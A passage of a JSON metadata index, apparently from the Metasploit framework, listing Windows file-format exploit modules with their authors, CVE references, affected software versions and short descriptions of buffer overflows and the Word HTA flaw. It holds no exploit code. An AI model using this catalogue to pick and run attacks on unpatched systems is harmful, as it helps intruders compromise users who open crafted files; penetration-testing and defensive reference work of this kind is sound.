"description": "This module creates a malicious RTF file that when opened in\n vulnerable versions of Microsoft Word will lead to code execution.\n The flaw exists in how a olelink object can make a http(s) request,\n and execute hta code in response.\n\n This bug was originally seen being exploited in the wild starting\n in Oct 2016. This module was created by reversing a public\n malware sample.",
"references": [
"CVE-2017-0199",
"URL-https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/",
"URL-https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html",
"URL-https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/",
"URL-https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html",
"URL-https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html",
"URL-https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf",
"URL-https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/",
"URL-https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100",
"URL-https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/",
"URL-https://www.microsoft.com/en-us/download/details.aspx?id=10725",
"URL-https://msdn.microsoft.com/en-us/library/dd942294.aspx",
"URL-https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf",
"URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Microsoft Office Word"
],
"mod_time": "2017-08-20 17:48:03 +0000",
"path": "/modules/exploits/windows/fileformat/office_word_hta.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/office_word_hta",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/openoffice_ole": {
"name": "OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow",
"full_name": "exploit/windows/fileformat/openoffice_ole",
"rank": 300,
"disclosure_date": "2008-04-17",
"type": "exploit",
"author": [
"Marsu <Marsupilamipowa@hotmail.fr>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in OpenOffice 2.3.1 and 2.3.0 on\n Microsoft Windows XP SP3.\n\n By supplying a OLE file with a malformed DocumentSummaryInformation stream, an\n attacker can gain control of the execution flow, which results arbitrary code\n execution under the context of the user.",
"references": [
"CVE-2008-0320",
"OSVDB-44472",
"BID-28819",
"EDB-5584",
"URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=694"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"OpenOffice 2.3.1 / 2.3.0 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/openoffice_ole.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/openoffice_ole",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/orbit_download_failed_bof": {
"name": "Orbit Downloader URL Unicode Conversion Overflow",
"full_name": "exploit/windows/fileformat/orbit_download_failed_bof",
"rank": 300,
"disclosure_date": "2008-04-03",
"type": "exploit",
"author": [
"Diego Juarez",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in Orbit Downloader.\n The vulnerability is due to Orbit converting a URL ascii string to unicode\n in an insecure way with MultiByteToWideChar.\n The vulnerability is exploited with a specially crafted metalink file that\n should be opened with Orbit through the \"File->Add Metalink...\" option.",
"references": [
"BID-28541",
"OSVDB-44036",
"CVE-2008-1602",
"URL-http://www.coresecurity.com/content/orbit-downloader"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Orbit Downloader 6.4 on Windows XP SP3",
"Orbit Downloader 6.4 on Windows 7"
],
"mod_time": "2017-09-22 18:49:09 +0000",
"path": "/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/orbit_download_failed_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/orbital_viewer_orb": {
"name": "Orbital Viewer ORB File Parsing Buffer Overflow",
"full_name": "exploit/windows/fileformat/orbital_viewer_orb",
"rank": 500,
"disclosure_date": "2010-02-27",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in David Manthey's\n Orbital Viewer. When processing .ORB files, data is read from file into\n a fixed-size stack buffer using the fscanf function. Since no bounds\n checking is done, a buffer overflow can occur. Attackers can execute\n arbitrary code by convincing their victim to open an ORB file.",
"references": [
"BID-38436",
"OSVDB-62580",
"CVE-2010-0688",
"URL-http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-011-orbital-viewer-orb-buffer-overflow/",
"EDB-11581"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Orbital Viewer 1.04 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/orbital_viewer_orb.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/orbital_viewer_orb",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ovf_format_string": {
"name": "VMWare OVF Tools Format String Vulnerability",
"full_name": "exploit/windows/fileformat/ovf_format_string",
"rank": 300,
"disclosure_date": "2012-11-08",
"type": "exploit",
"author": [
"Jeremy Brown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for\n Windows. The vulnerability occurs when printing error messages while parsing a\n a malformed OVF file. The module has been tested successfully with VMWare OVF Tools\n 2.1 on Windows XP SP3.",
"references": [
"CVE-2012-3569",
"OSVDB-87117",
"BID-56468",
"URL-http://www.vmware.com/security/advisories/VMSA-2012-0015.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"VMWare OVF Tools 2.1 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ovf_format_string.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ovf_format_string",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/proshow_cellimage_bof": {
"name": "ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/proshow_cellimage_bof",
"rank": 500,
"disclosure_date": "2009-08-20",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in ProShow Gold v4.0.2549.\n An attacker must send the file to victim and the victim must open the file.",
"references": [
"CVE-2009-3214",
"OSVDB-57226",
"EDB-9483",
"EDB-9519"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/proshow_cellimage_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/proshow_load_bof": {
"name": "Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow",
"full_name": "exploit/windows/fileformat/proshow_load_bof",
"rank": 300,
"disclosure_date": "2012-06-06",
"type": "exploit",
"author": [
"Julien Ahrens",
"mr.pr0n",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in Photodex ProShow Producer\n v5.0.3256 in the handling of the plugins load list file. An attacker must send the\n crafted \"load\" file to victim, who must store it in the installation directory. The\n vulnerability will be triggered the next time ProShow is opened. The module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.",
"references": [
"OSVDB-83745",
"EDB-19563",
"EDB-20036",
"URL-http://security.inshell.net/advisory/30"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Photodex ProShow Producer 5.0.3256 / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/proshow_load_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/proshow_load_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/publishit_pui": {
"name": "Publish-It PUI Buffer Overflow (SEH)",
"full_name": "exploit/windows/fileformat/publishit_pui",
"rank": 300,
"disclosure_date": "2014-02-05",
"type": "exploit",
"author": [
"Daniel Kazimirow",
"Andrew Smith \"jakx_\""
],
"description": "This module exploits a stack based buffer overflow in Publish-It when\n processing a specially crafted .PUI file. This vulnerability could be\n exploited by a remote attacker to execute arbitrary code on the target\n machine by enticing a user of Publish-It to open a malicious .PUI file.",
"references": [
"OSVDB-102911",
"CVE-2014-0980",
"EDB-31461"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Publish-It 3.6d"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/publishit_pui.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/publishit_pui",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/real_networks_netzip_bof": {
"name": "Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability",
"full_name": "exploit/windows/fileformat/real_networks_netzip_bof",
"rank": 400,
"disclosure_date": "2011-01-30",
"type": "exploit",
"author": [
"C4SS!0 G0M3S",
"TecR0c <roccogiovannicalvi@gmail.com>"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in\n version 7.5.1 86 of Real Networks Netzip Classic.\n In order for the command to be executed, an attacker must convince someone to\n load a specially crafted zip file with NetZip Classic.\n By doing so, an attacker can execute arbitrary code as the victim user.",
"references": [
"OSVDB-83436",
"EDB-16083",
"BID-46059",
"URL-http://proforma.real.com"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3",
"Windows 7/Windows Vista"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/real_networks_netzip_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/real_player_url_property_bof": {
"name": "RealPlayer RealMedia File Handling Buffer Overflow",
"full_name": "exploit/windows/fileformat/real_player_url_property_bof",
"rank": 300,
"disclosure_date": "2012-12-14",
"type": "exploit",
"author": [
"suto <suto@vnsecurity.net>"
],
"description": "This module exploits a stack based buffer overflow on RealPlayer <=15.0.6.14.\n The vulnerability exists in the handling of real media files, due to the insecure\n usage of the GetPrivateProfileString function to retrieve the URL property from an\n InternetShortcut section.\n\n This module generates a malicious rm file which must be opened with RealPlayer via\n drag and drop or double click methods. It has been tested successfully on Windows\n XP SP3 with RealPlayer 15.0.5.109.",
"references": [
"CVE-2012-5691",
"OSVDB-88486",
"BID-56956",
"URL-http://service.real.com/realplayer/security/12142012_player/en/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 / Real Player 15.0.5.109"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/real_player_url_property_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/real_player_url_property_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/realplayer_ver_attribute_bof": {
"name": "RealNetworks RealPlayer Version Attribute Buffer Overflow",
"full_name": "exploit/windows/fileformat/realplayer_ver_attribute_bof",
"rank": 300,
"disclosure_date": "2013-12-20",
"type": "exploit",
"author": [
"Gabor Seljan"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in\n version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by\n improper bounds checking of the version and encoding attributes inside\n the XML declaration.\n\n By persuading the victim to open a specially-crafted .RMP file, a\n remote attacker could execute arbitrary code on the system or cause\n the application to crash.",
"references": [
"BID-64695",
"EDB-30468",
"OSVDB-101356",
"CVE-2013-7260",
"US-CERT-VU-698278",
"URL-http://service.real.com/realplayer/security/12202013_player/en/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2/SP3 (DEP Bypass) / RealPlayer 16.0.3.51/16.0.2.32"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/realplayer_ver_attribute_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/safenet_softremote_groupname": {
"name": "SafeNet SoftRemote GROUPNAME Buffer Overflow",
"full_name": "exploit/windows/fileformat/safenet_softremote_groupname",
"rank": 400,
"disclosure_date": "2009-10-30",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in SafeNet SoftRemote\n Security Policy Editor <= 10.8.5. When an attacker\n creates a specially formatted security policy with an\n overly long GROUPNAME argument, it is possible to execute\n arbitrary code.",
"references": [
"CVE-2009-3861",
"OSVDB-59660",
"URL-http://www.senseofsecurity.com.au/advisories/SOS-09-008"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 English",
"WinSrv 2000 SP4 English",
"WinSrv 2000 SP2 English",
"WinSrv 2003 Enterprise Edition SP1 (v1023) English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/safenet_softremote_groupname",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/sascam_get": {
"name": "SasCam Webcam Server v.2.6.5 Get() Method Buffer Overflow",
"full_name": "exploit/windows/fileformat/sascam_get",
"rank": 100,
"disclosure_date": "2008-12-29",
"type": "exploit",
"author": [
"dean <dean@zerodaysolutions.com>"
],
"description": "The SasCam Webcam Server ActiveX control is vulnerable to a buffer overflow.\n By passing an overly long argument via the Get method, a remote attacker could\n overflow a buffer and execute arbitrary code on the system with the privileges\n of the user. This control is not marked safe for scripting, please choose your\n attack vector carefully.",
"references": [
"CVE-2008-6898",
"OSVDB-55945",
"BID-33053"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 / IE 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/sascam_get.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/sascam_get",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/scadaphone_zip": {
"name": "ScadaTEC ScadaPhone Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/scadaphone_zip",
"rank": 400,
"disclosure_date": "2011-09-12",
"type": "exploit",
"author": [
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in\n version 5.3.11.1230 of scadaTEC's ScadaPhone.\n\n In order for the command to be executed, an attacker must convince someone to\n load a specially crafted project zip file with ScadaPhone.\n By doing so, an attacker can execute arbitrary code as the victim user.",
"references": [
"CVE-2011-4535",
"OSVDB-75375",
"URL-http://www.scadatec.com/",
"EDB-17817"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/scadaphone_zip.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/scadaphone_zip",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/shadow_stream_recorder_bof": {
"name": "Shadow Stream Recorder 3.0.1.7 Buffer Overflow",
"full_name": "exploit/windows/fileformat/shadow_stream_recorder_bof",
"rank": 300,
"disclosure_date": "2010-03-29",
"type": "exploit",
"author": [
"AlpHaNiX <alpha@hacker.bz>",
"b0telh0 <me@gotgeek.com.br>"
],
"description": "This module exploits a buffer overflow in Shadow Stream Recorder 3.0.1.7.\n Using the application to open a specially crafted asx file, a buffer\n overflow may occur to allow arbitrary code execution under the context\n of the user.",
"references": [
"CVE-2009-1641",
"OSVDB-81487",
"EDB-11957",
"BID-34864"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/shadow_stream_recorder_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/shaper_pdf_bof": {
"name": "PDF Shaper Buffer Overflow",
"full_name": "exploit/windows/fileformat/shaper_pdf_bof",
"rank": 300,
"disclosure_date": "2015-10-03",
"type": "exploit",
"author": [
"metacom27 <metacom27@gmail.com - twitter.com/m3tac0m>",
"metacom"
],
"description": "PDF Shaper is prone to a security vulnerability when processing PDF files.\n The vulnerability appears when we use Convert PDF to Image and use a specially\n crafted PDF file. This module has been tested successfully on Win XP, Win 7,\n Win 8, Win 10.",
"references": [
"EDB-37760"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"<Win Xp, Win 7, Win 8, Win 10 / PDF Shaper v.3.5 and v.3.6>"
],
"mod_time": "2018-08-26 04:18:38 +0000",
"path": "/modules/exploits/windows/fileformat/shaper_pdf_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/shaper_pdf_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/somplplayer_m3u": {
"name": "S.O.M.P.L 1.0 Player Buffer Overflow",
"full_name": "exploit/windows/fileformat/somplplayer_m3u",
"rank": 500,
"disclosure_date": "2010-01-22",
"type": "exploit",
"author": [
"Rick2600",
"dookie"
],
"description": "This module exploits a buffer overflow in Simple Open Music Player v1.0. When\n the application is used to import a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.",
"references": [
"OSVDB-64368",
"EDB-11219"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/somplplayer_m3u.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/somplplayer_m3u",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/subtitle_processor_m3u_bof": {
"name": "Subtitle Processor 7.7.1 .M3U SEH Unicode Buffer Overflow",
"full_name": "exploit/windows/fileformat/subtitle_processor_m3u_bof",
"rank": 300,
"disclosure_date": "2011-04-26",
"type": "exploit",
"author": [
"Brandon Murphy",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Subtitle Processor 7. By\n supplying a long string of data as a .m3u file, Subtitle Processor first converts\n this input in Unicode, which expands the string size, and then attempts to copy it\n inline on the stack. This results a buffer overflow with SEH overwritten, allowing\n arbitrary code execution.",
"references": [
"OSVDB-72050",
"EDB-17217",
"URL-http://sourceforge.net/projects/subtitleproc/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/subtitle_processor_m3u_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/syncbreeze_xml": {
"name": "Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow",
"full_name": "exploit/windows/fileformat/syncbreeze_xml",
"rank": 300,
"disclosure_date": "2017-03-29",
"type": "exploit",
"author": [
"Daniel Teixeira"
],
"description": "This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16\n by using the import command option to import a specially crafted xml file.",
"references": [
"CVE-2017-7310",
"EDB-41773"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2018-01-23 16:34:49 +0000",
"path": "/modules/exploits/windows/fileformat/syncbreeze_xml.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/syncbreeze_xml",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/tfm_mmplayer_m3u_ppl_bof": {
"name": "TFM MMPlayer (m3u/ppl File) Buffer Overflow",
"full_name": "exploit/windows/fileformat/tfm_mmplayer_m3u_ppl_bof",
"rank": 400,
"disclosure_date": "2012-03-23",
"type": "exploit",
"author": [
"RjRjh Hack3r",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a buffer overflow in MMPlayer 2.2\n The vulnerability is triggered when opening a malformed M3U/PPL file\n that contains an overly long string, which results in overwriting a\n SEH record, thus allowing arbitrary code execution under the context\n of the user.",
"references": [
"CVE-2009-2566",
"OSVDB-80532",
"BID-52698",
"EDB-18656",
"EDB-18657"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/tfm_mmplayer_m3u_ppl_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/total_video_player_ini_bof": {
"name": "Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",
"full_name": "exploit/windows/fileformat/total_video_player_ini_bof",
"rank": 300,
"disclosure_date": "2013-11-24",
"type": "exploit",
"author": [
"Mike Czumak",
"Fr330wn4g3 <Fr330wn4g3@gmail.com>"
],
"description": "This module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability\n occurs opening malformed Settings.ini file e.g. \"C:\\Program Files\\Total Video Player\\\".\n This module has been tested successfully on Windows WinXp-Sp3-EN, Windows 7, and Windows 8.",
"references": [
"OSVDB-100619",
"EDB-29799"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/total_video_player_ini_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/tugzip": {
"name": "TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability",
"full_name": "exploit/windows/fileformat/tugzip",
"rank": 400,
"disclosure_date": "2008-10-28",
"type": "exploit",
"author": [
"Stefan Marin",
"Lincoln",
"TecR0c <roccogiovannicalvi@gmail.com>",
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "This module exploits a stack-based buffer overflow vulnerability\n in the latest version 3.5 of TugZip archiving utility.\n In order to trigger the vulnerability, an attacker must convince someone\n to load a specially crafted zip file with TugZip by double click or file open.\n By doing so, an attacker can execute arbitrary code as the victim user.",
"references": [
"OSVDB-49371",
"CVE-2008-4779",
"BID-31913",
"EDB-12008"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/tugzip.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/tugzip",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ultraiso_ccd": {
"name": "UltraISO CCD File Parsing Buffer Overflow",
"full_name": "exploit/windows/fileformat/ultraiso_ccd",
"rank": 500,
"disclosure_date": "2009-04-03",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in EZB Systems, Inc's\n UltraISO. When processing .CCD files, data is read from file into a\n fixed-size stack buffer. Since no bounds checking is done, a buffer overflow\n can occur. Attackers can execute arbitrary code by convincing their victim\n to open an CCD file.\n\n NOTE: A file with the same base name, but the extension of \"img\" must also\n exist. Opening either file will trigger the vulnerability, but the files must\n both exist.",
"references": [
"CVE-2009-1260",
"OSVDB-53275",
"BID-34363",
"BID-38613",
"EDB-8343"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal - Double-Click/Command Line Open Method",
"Windows Universal - File->Open + Toolbar Open Methods"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ultraiso_ccd.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ultraiso_ccd",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ultraiso_cue": {
"name": "UltraISO CUE File Parsing Buffer Overflow",
"full_name": "exploit/windows/fileformat/ultraiso_cue",
"rank": 500,
"disclosure_date": "2007-05-24",
"type": "exploit",
"author": [
"n00b",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in EZB Systems, Inc's\n UltraISO. When processing .CUE files, data is read from file into a\n fixed-size stack buffer. Since no bounds checking is done, a buffer overflow\n can occur. Attackers can execute arbitrary code by convincing their victim\n to open an CUE file.\n\n NOTE: A file with the same base name, but the extension of \"bin\" must also\n exist. Opening either file will trigger the vulnerability, but the files must\n both exist.",
"references": [
"CVE-2007-2888",
"OSVDB-36570",
"BID-24140",
"EDB-3978"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows - UltraISO v8.6.2.2011 portable",
"Windows - UltraISO v8.6.0.1936"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ultraiso_cue.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ultraiso_cue",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ursoft_w32dasm": {
"name": "URSoft W32Dasm Disassembler Function Buffer Overflow",
"full_name": "exploit/windows/fileformat/ursoft_w32dasm",
"rank": 400,
"disclosure_date": "2005-01-24",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a buffer overflow in W32Dasm <= v8.93.\n By creating a malicious file and convincing a user to disassemble\n the file with a vulnerable version of W32Dasm, the Imports/Exports\n function is copied to the stack and arbitrary code may be executed\n locally as the user.",
"references": [
"CVE-2005-0308",
"OSVDB-13169",
"BID-12352",
"URL-http://aluigi.altervista.org/adv/w32dasmbof-adv.txt"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/fileformat/ursoft_w32dasm.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ursoft_w32dasm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/varicad_dwb": {
"name": "VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/varicad_dwb",
"rank": 500,
"disclosure_date": "2010-03-17",
"type": "exploit",
"author": [
"n00b",
"dookie",
"MC <mc@metasploit.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in VariCAD 2010-2.05 EN.\n An attacker must send the file to victim and the victim must open the file.",
"references": [
"OSVDB-63067",
"BID-38815",
"EDB-11789"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/varicad_dwb.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/varicad_dwb",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/videocharge_studio": {
"name": "VideoCharge Studio Buffer Overflow (SEH)",
"full_name": "exploit/windows/fileformat/videocharge_studio",
"rank": 300,
"disclosure_date": "2013-10-27",
"type": "exploit",
"author": [
"metacom",
"Andrew Smith",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when\n processing a specially crafted .VSC file. This vulnerability could be\n exploited by a remote attacker to execute arbitrary code on the target\n machine by enticing a user of VideoCharge Studio to open a malicious .VSC file.",
"references": [
"OSVDB-69616",
"EBD-29234"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
